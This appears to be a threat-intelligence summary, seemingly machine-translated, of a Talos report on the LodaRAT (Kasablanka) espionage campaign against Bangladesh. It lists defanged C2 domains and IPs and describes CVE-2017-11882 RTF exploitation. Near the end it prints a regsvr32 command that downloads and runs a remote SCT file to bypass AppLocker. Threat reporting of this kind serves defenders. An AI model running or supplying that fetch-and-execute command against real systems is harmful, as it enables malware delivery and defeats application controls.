LodaRAT is linked to a specific campaign against Bangladesh.
Kasablanka (LodaRAT) appears to be motivated by information gathering and espionage rather than direct financial gain.
Talos has identified an activity starting in October 2020. Currently, the activity is still in progress, currently targeting Windows and Android platforms. info.v-pn [.] co was first recorded on July 2, 2020 In order to carry malicious activities, it was used as Loda’s C2, that is, the day the domain was also registered. From this date, this host has been used for Loda-related malicious activities. It has been changed many times in the past seven months Several IPs.
The Windows version uses IP 107.172.30 [.] 213 as the placement site, which hosts the first stage script and main payload.
For this event, malicious participants used the IP address 160.178.220 [.] 194 as the hosting site for the C2 and Android versions in the early stage, and also changed their C2 to info.v-pn [.] co.
Based on the certificate fingerprints used to sign the two Android samples, we believe that C2 was recently changed to info.v-pn[.]co and is currently being distributed from the new domain lap-top[.]xyz.
The development version signed by the same certificate (the internal RFC1918 address uses 192.168.1.169 as C2) has been anonymously submitted to VirusTotal from the same Moroccan geographic area as the IP geographic location used in this IP (160.178.220[.]194). The event The early stages of the show that the developers of Loda4Android may be located in Morocco.
The attacker uses a malicious RTF document that uses CVE-2017-11882 to download the malicious SCT file.
The files analyzed during this investigation did not have any confusion. The payload of the vulnerability is in plain text format, which can be easily viewed.
The second stage of the infection chain transfers the technology previously used by Loda. As shown above, the payload runs the following command:
regsvr32 / s / u / n /i:hxxp://107[.]172[.]30[.]
This is a known technique in Windows that bypasses AppLocker by abusing the regsvr32 command. Using this technique, an attacker can download and execute SCT files while bypassing Applocker.